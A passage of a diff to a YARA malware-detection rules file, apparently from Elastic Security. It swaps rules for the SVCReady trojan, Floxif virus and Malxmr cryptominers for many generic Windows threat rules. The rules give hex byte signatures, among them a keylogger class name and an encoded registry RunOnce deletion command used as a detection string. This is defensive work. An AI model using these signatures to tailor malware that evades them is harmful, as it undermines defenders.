severity = 100 + fingerprint = "63d21d89b4ceea1fbc44a1dfd2dbb9ac3eb945884726a9809133624b10168c7a" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { FF E1 D7 66 8C 41 03 EB F8 64 E5 7E F1 06 73 AB BF 6B 1D 6A B9 B6 BA 41 A2 91 49 5E 85 51 A0 83 23 } + $a1 = { 83 E4 F8 83 EC 6C 53 56 8B 75 08 57 8B C6 8D 4C 24 58 E8 26 80 00 00 8B C6 8D 4C 24 38 E8 1B 80 00 00 80 7C 24 54 00 8B 7E 0C 8B 5E 08 89 7C 24 1C 74 09 8B 74 24 50 E8 61 80 00 00 83 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Svcready_Af498D39 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D51Dd31B : FILE MEMORY { meta: - description = "Detects Windows Trojan Svcready (Windows.Trojan.SVCReady)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "af498d39-6ae8-46de-ad6c-81b346d80139" - date = "2022-06-12" - modified = "2022-07-18" + id = "d51dd31b-1735-4fd7-9906-b07406a9d20c" + date = "2024-01-24" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SVCReady.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "08e427c92010a8a282c894cf5a77a874e09c08e283a66f1905c131871cc4d273" - logic_hash = "e3520103064cf82cd1747f8889667929d23466c9febfda7e4968a3679db97d71" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2131-L2150" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2a61c0305d82b6b4180c3d817c28286ab8ee56de44e171522bd07a60a1d8492d" + logic_hash = "85fc7aa81489b304c348ead2d7042bb5518ff4579b1d3e837290032c4b144e47" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "6e30d9977698c7864a8c264a7fe8c9a558f6e51dda9c887bda94261ce187645f" + fingerprint = "f313354a52ba8058c36aea696fde5548c7eb9211cac3b6caa511671445efe2a7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -86690,2091 +86910,2014 @@ rule ELASTIC_Windows_Trojan_Svcready_Af498D39 : FILE MEMORY os = "windows" strings: - $a1 = "RunPEDllNative::HookNtCreateUserProcess fail: targetMapping.valid" ascii fullword - $a2 = "Section Mapping error:Process=0x%x Section [%s] res[0x%x] != va[0x%x] Status:%u" ascii fullword - $a3 = "%s - %I64d < %I64d > %I64d clicks, %I64d pixels, ready=%i" ascii fullword - $a4 = "Svc:windowThreadRunner done" ascii fullword - $a5 = "svc commonMain" ascii fullword + $a1 = { 7E 7D 7C 7B 7A 79 78 78 76 77 74 73 72 } + $a2 = { 6D 6C 6B 6A 69 68 67 66 65 64 63 62 61 60 60 5E 66 60 5B 5A } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Virus_Floxif_493D1897 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_3A321F0A : FILE MEMORY { meta: - description = "Detects Windows Virus Floxif (Windows.Virus.Floxif)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "493d1897-864e-4f18-8511-0c6c9d990990" - date = "2023-09-26" - modified = "2023-11-02" + id = "3a321f0a-2775-455f-b8c2-30591ebfe4ac" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Virus_Floxif.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e628b7973ee25fdfd8f849fdf5923c6fba48141de802b0b4ce3e9ad2e40fe470" - logic_hash = "d3f516966bd4423c49771251075a1ea2f725aec91615f7f44dd098da2a4f3574" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2152-L2170" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "91056e8c53dc1e97c7feafab31f0943f150d89a0b0026bcfb3664d2e93ccfe2b" + logic_hash = "83834dd7d4df5de4b6a032f1896f52c1ebdf16ca8ad9766e8872243f1a6da67e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6a043d05ca24846cfba28b5ea603a3e512a5af4f4e15629851a922190245ca1e" - severity = 100 + fingerprint = "230c3bbc70ec93888f5cd68598dcc004844db67f17d1048a51f6c6408bc4a956" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 8B 54 24 04 80 7A 03 01 75 04 8D 42 04 C3 8D 42 04 53 8B C8 8A 5A 02 84 DB 74 02 30 19 8A 19 } + $a1 = { 83 EC 44 8D 45 14 8B 4D 10 85 C9 89 5D F8 89 7D FC 0F 8E 3D 01 00 00 49 8D 55 17 83 E2 FC 89 4D 10 85 C9 8D 42 08 8B 58 F8 8B 78 FC 89 5D D4 89 7D D8 0F 8E 31 01 00 00 83 C2 0B 49 83 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_D13544D7 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_A82F45A8 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "d13544d7-4834-4ce7-9339-9c933ee51b2c" - date = "2021-01-12" - modified = "2021-09-16" + id = "a82f45a8-8e47-4966-9d48-9af61a21ac42" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "85fa30ba59602199fd99463acf50bd607e755c2e18cd8843ffcfb6b1aca24bb3" - logic_hash = "fcb2fc7a84fbcd23f9a9d9fd2750c45ff881689670a373fce0cc444183d11999" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2172-L2190" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ad07428104d3aa7abec2fd86562eaa8600d3e4b0f8d78ba1446f340d10008b53" + logic_hash = "70ebab6b03af38ef8c81664cf49ab07066a9672666599d99c91291a9d2e3af0b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "02e1be4a7073e849b183851994c83f1f2077fe74cbcdd0b3066999d0c9499a09" - severity = 100 + fingerprint = "e3a1faabc15e2767eb065f4e2a7c6f75590cba1368db1aab1af972a5aeca4031" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 51 50 4D 21 EB 4B 8D 0C 24 4C 89 54 24 90 4C 89 DD 48 BA AA AA AA AA AA AA } + $a1 = { 55 8B EC 51 89 4D FC 8B 4D 08 51 8B 4D FC 83 C0 04 E8 66 7D F6 FF 59 5D C2 08 00 90 55 8B EC 51 89 4D FC 8B 4D 08 51 41 51 8B 4D FC E8 CF FF FF FF 59 5D C2 04 00 8B C0 55 8B EC 83 C4 F8 53 56 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_Ad09E090 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D6625Ad7 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "ad09e090-098e-461d-b967-e45654b902bb" - date = "2021-01-12" - modified = "2021-09-16" + id = "d6625ad7-7f2c-4445-a5f2-a9444425f3a4" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cdd3d567fbcbdd6799afad241ae29acbe4ab549445e5c4fc0678d16e75b40dfa" - logic_hash = "6c2d548ba9f01444e8fe4b0aa8a0556970acac06d39bb7c87446b6b91ab0d129" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2192-L2210" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "878c9745320593573597d62c8f3adb3bef0b554cd51b18216f6d9f5d1a32a931" + logic_hash = "e90aff7c35f60cc3446f9eeb2131edb7125bfa04eb8f90c5671d06e9ff269755" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "a62729bbe04eca01dbb3c56de63466ed115f30926fc5d203c9bae75a93227e09" - severity = 100 + fingerprint = "0e1bb99e22b53e6bb6350f95caaac592ddcad7695e72e298c7ab1d29d1dd4c1f" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 50 8B 44 24 64 89 54 24 54 39 C3 77 0E 72 08 8B 44 24 60 } + $a1 = { 2E 3F 41 56 3C 6C 61 6D 62 64 61 5F 31 3E 40 3F 4C 40 3F 3F 6F 6E 5F 65 76 65 6E 74 5F 61 64 64 40 43 6F 6D 70 6F 6E 65 6E 74 5F 4B 65 79 6C 6F 67 65 72 40 40 45 41 45 58 49 40 5A 40 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_12299814 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_61Bbb571 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "12299814-c916-4cad-a627-f8b082f5643d" - date = "2021-01-12" - modified = "2021-09-16" + id = "61bbb571-8544-4874-9811-bd74a5e9f712" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "eb3802496bd2fef72bd2a07e32ea753f69f1c2cc0b5a605e480f3bbb80b22676" - logic_hash = "52e8bcd0512cedf0fa048b6990a5d331f4302d99b00681c83a76587415894b1e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2212-L2230" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "41e2a6cecb1735e8f09b1ba5dccff3c08afe395b6214396e545347927d1815a8" + logic_hash = "6b1ec666f3689638b9db9f041b0a89660b27c32590b747c5da3f4a02f01c7112" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b626f04a8648b0f42564df9c2ef3989e602d1307b18256e028450c495dc15260" - severity = 100 + fingerprint = "be0b1be30cab0789a5df29153187cf812e53cd35dbe31f9527eca2396d7503b5" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 3C 40 00 83 C4 10 89 44 24 04 80 7D 00 00 74 97 83 EC 0C 89 } + $a1 = { 83 EC 14 8B 45 08 53 56 57 8B F9 BE 49 92 24 09 6A 1C 59 89 7D F8 2B 07 99 F7 F9 89 45 FC 8B 47 04 2B 07 99 F7 F9 89 45 F0 3B C6 0F 84 E5 00 00 00 8D 58 01 8B 47 08 2B 07 99 F7 F9 8B } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_A47B77E4 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_4A605E93 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "a47b77e4-0d8d-4714-8527-7b783f0f27b8" - date = "2021-01-12" - modified = "2021-09-16" + id = "4a605e93-971d-4257-b382-065159840a4c" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "995b43ccb20343494e314824343a567fd85f430e241fdeb43704d9d4937d76cc" - logic_hash = "bd2b14c8b8e2649af837224fadb32bf0fb67ac403189063a8cb10ad344fb8015" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2232-L2250" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1a84e25505a54e8e308714b53123396df74df1bde223bb306c0dc6220c1f0bbb" + logic_hash = "6ad7afa5bd03916917e2bbf4d736331f4319b20bfde296d7e62315584813699f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "635a35defde186972cd6626bd75a1e557a1a9008ab93b38ef1a3635b3210354b" - severity = 100 + fingerprint = "58185f9fdf5bbc57cd708d8c963a37824e377a045549f2eb78d5fa501082b687" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 8D 48 49 5E 97 87 DC 73 86 19 51 B3 36 1A 6E FC 8C CC 2C 6E 0B } + $a1 = { 20 48 8B 19 45 33 C0 48 85 DB 74 65 4C 89 01 48 83 FA FF 75 17 41 8B C0 44 38 03 74 2D 48 8B CB 48 FF C1 FF C0 44 38 01 75 F6 EB 1E 48 83 FA FE 75 1B 41 8B C0 66 44 39 03 74 0F 48 8B } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_21D0550B : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_B509Dfc8 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "21d0550b-4f15-4481-ba9c-2be26ea8f81a" - date = "2021-01-12" - modified = "2021-09-16" + id = "b509dfc8-6ec3-4315-a1ec-61e6b65793e7" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "07db41a4ddaac802b04df5e5bbae0881fead30cb8f6fa53a8a2e1edf14f2d36b" - logic_hash = "c9a12eee281b1e944b5572142c5e18ff087989f45026a94268df22d483210178" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2252-L2270" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9b5124e5e1be30d3f2ad1020bbdb93e2ceeada4c4d36f71b2abbd728bd5292b8" + logic_hash = "90b00caf612f56a898b24c28ae6febda3fd11f382ab1deba522bdd2e2ba254b4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5b556d2e3e48fda57c741c4c7b9efb72aad579e5055df366cdb9cfa38e496494" - severity = 100 + fingerprint = "bb1e607fe0d84f25c9bd09d31614310e204dce17c4050be6ce7dc6ed9dfd8f92" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 3B 31 C0 48 83 C9 FF 48 89 EE F2 AE 48 8B 3B 48 F7 D1 48 FF C9 } + $a1 = { 28 00 00 0A 6F 29 00 00 0A 6F 2A 00 00 0A 13 04 11 04 28 22 00 00 0A 28 2B 00 00 0A 2D 0D 11 04 28 22 00 00 0A 28 2C 00 00 0A 26 06 28 2D 00 00 0A 2C 0F 06 73 28 00 00 0A 13 05 11 05 6F 2E 00 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_C8Adb449 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_7A49053E : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c8adb449-3de5-4cdd-9b62-fe4bcbe82394" - date = "2021-01-12" - modified = "2021-09-16" + id = "7a49053e-5ae4-4141-9471-4a92e0ee226e" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00ec7a6e9611b5c0e26c148ae5ebfedc57cf52b21e93c2fe3eac85bf88edc7ea" - logic_hash = "9c43602dc752dd737a983874bee5ec6af145ce5fdd45d03864a1afdc2aec3ad4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2272-L2292" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "29fb2b18cfd72a2966640ff59e67c89f93f83fc17afad2dfcacf9f53e9ea3446" + logic_hash = "6db95f20a2bcdfd7cb37cb33dae6351dd19f51a8c3cae54b1bb034af17378094" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "838950826835e811eb7ea3af7a612b4263d171ded4761d2b547a4012adba4028" - severity = 100 + fingerprint = "49c41c5372da04b770d903013ee7f71193a4650340fd4245d6d5bceff674d637" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { D2 4C 89 54 24 A0 4C 89 FA 48 F7 D2 48 23 54 24 88 49 89 D2 48 8B 54 } + $a1 = { 5D 76 3F 3F 32 40 59 41 50 41 58 49 40 5A 66 } + $a2 = { 41 75 74 68 6F 72 69 7A 61 26 42 61 73 69 63 48 24 } + $a3 = { 4A 7E 4C 65 61 76 65 47 65 74 51 75 65 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_Bcab1E8F : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Fca7F863 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "bcab1e8f-8a8f-4309-8e47-416861d1894c" - date = "2021-01-12" - modified = "2021-09-16" + id = "fca7f863-8d5b-4b94-8f60-a72c76782d1d" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "19df7fd22051abe3f782432398ea30f8be88cf42ef14bc301b1676f35b37cd7e" - logic_hash = "72643b2860f40c7e901c671d7cc9992870b91912df5d75d2ffba0dfb8684f8d3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2294-L2312" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9d0e786dd8f1dc05eae910c6bcf15b5d05b4b6b0543618ca0c2ff3c4bb657af3" + logic_hash = "ad45fe6e8257d012824b36aaee1beccb82c1b78031de86c1f1dd26d5be88aa6f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2106f2ba97c75468a2f25d1266053791034ff9a15d57df1ba3caf21f74b812f7" - severity = 100 + fingerprint = "4b391399465f18b01d7cbdf222dd7249f4fff0a5b4b931e568d92f47cc283a27" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { EB D9 D3 0B EB D5 29 0B EB D1 03 48 6C 01 0B EB CA 0F AF 0B } + $a1 = { 55 89 E5 8D 64 24 F4 53 89 C3 6A 0C 8D 45 F4 50 6A 00 FF 53 10 50 FF 53 0C 50 FF 53 24 8B 45 F4 89 43 2C 03 40 3C 8B 40 50 89 43 34 6A 40 68 00 30 00 00 FF 73 34 6A 00 FF 13 89 43 30 8B 4B 34 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_6671F33A : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Cafbd6A3 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6671f33a-03bb-40d8-b439-64a66082457d" - date = "2021-01-12" - modified = "2021-09-16" + id = "cafbd6a3-c367-467d-b305-fb262e4d6d07" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "85fa30ba59602199fd99463acf50bd607e755c2e18cd8843ffcfb6b1aca24bb3" - logic_hash = "a15c842c7c7ec3b11183a1502f8ec03ea786e3f0d47fbab58c62ffff7b018030" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2314-L2333" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "97081a51aa016d0e6c9ecadc09ff858bf43364265a006db9d7cc133f8429bc46" + logic_hash = "28813fc8a49b6ec3fe7675409fde923f0f30851429a526c142e0a228b4e0efa6" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "cb178050ee351059b083c6a71b5b1b6a9e0aa733598a05b3571701949b4e6b28" - severity = 100 + quality = 71 + tags = "FILE, MEMORY" + fingerprint = "d3237c30fb6eef10b89dc9138572f781cc7d9dad1524e2e27eee82c50f863fbb" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4D 18 48 01 4B 18 5A 5B 5D C3 83 C8 FF C3 48 85 FF 49 89 F8 } + $a1 = { 6C 6B 73 6A 66 68 67 6C 6B 6A 66 73 64 67 31 33 31 } + $a2 = { 72 65 67 20 44 65 6C 65 74 65 20 22 48 4B 4C 4D 5C 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 52 75 6E 4F 6E 63 65 22 20 2F 66 20 3E 20 6E 75 6C } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_74418Ec5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D8F834A9 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "74418ec5-f84a-4d79-b1b0-c1d579ad7b97" - date = "2021-01-12" - modified = "2021-09-16" + id = "d8f834a9-41b7-4fc9-8100-87b9b07c0bc7" + date = "2024-01-29" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L161-L179" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d79ad967ac9fc0b1b6d54e844de60d7ba3eaad673ee69d30f9f804e5ccbf2880" - logic_hash = "e74463f53611baaec7c8e126218d8353c6e3a5e71c20e98a7035df6b771b690b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2335-L2353" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c118c2064a5839ebd57a67a7be731fffe89669a8f17c1fe678432d4ff85e7929" + logic_hash = "9fa1a65f3290867e4c59f14242f7261741e792b8be48c053ac320a315f2c1beb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ec14cac86b2b0f75f1d01b7fb4b57bfa3365f8e4d11bfed2707b0174875d1234" - severity = 100 + fingerprint = "fcf7fc680c762ffd9293a84c9ac2ba34b18dc928417ebdabd6dfa998f96ed1f6" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { F9 75 7A A8 8A 65 FC 5C E0 6E 09 4B 8F AA B3 A4 66 44 B1 D1 13 } + $a1 = { 83 C4 F4 53 56 57 8B F9 8B F2 8B D8 33 D2 8A 55 08 0F AF 53 30 D1 FA 79 03 83 D2 00 03 53 30 8B 43 34 E8 62 48 04 00 89 45 FC 68 20 00 CC 00 8B 45 20 50 57 56 8B 45 FC 8B 10 FF 52 20 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Malxmr_979160F6 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_De3F91C6 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Malxmr (Linux.Cryptominer.Malxmr)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "979160f6-402a-4e4b-858a-374c9415493b" - date = "2021-01-12" - modified = "2021-09-16" + id = "de3f91c6-bca8-4ed6-8ba3-a53903556903" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Malxmr.yar#L181-L198" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e70097fb263c90576e87e76cc7be391dbf9c9d73bbd7fb8e5ec282e6ac1f648d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L2355-L2373" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e2cd4a8ccbf4a3a93c1387c66d94e9506b5981357004929ce5a41fcedfffb20f" + logic_hash = "032ac2adb11782d823f50bfedf4e4decb731dbe7d3abbb3b05ccff598ba7edb8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fb933702578e2cf7e8ad74554ef93c07b610d6da8bc5743cbf86c363c1615f40" - severity = 100 + fingerprint = "bd994a85b967e56628a3fcd784e4d73cf6bd9f34a222d1bb52b1e87b775fdd06" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E0 08 C1 ED 10 41 31 C3 89 D8 45 09 D0 C1 E8 10 C1 E3 10 41 C1 } + $a1 = { 55 8B EC 56 8B 75 08 80 7E 04 00 74 08 FF 36 E8 0B 41 00 00 59 83 26 00 C6 46 04 00 5E 5D C3 55 8B EC 8B 45 08 8B 4D 0C 3B C1 75 04 33 C0 5D C3 83 C1 05 83 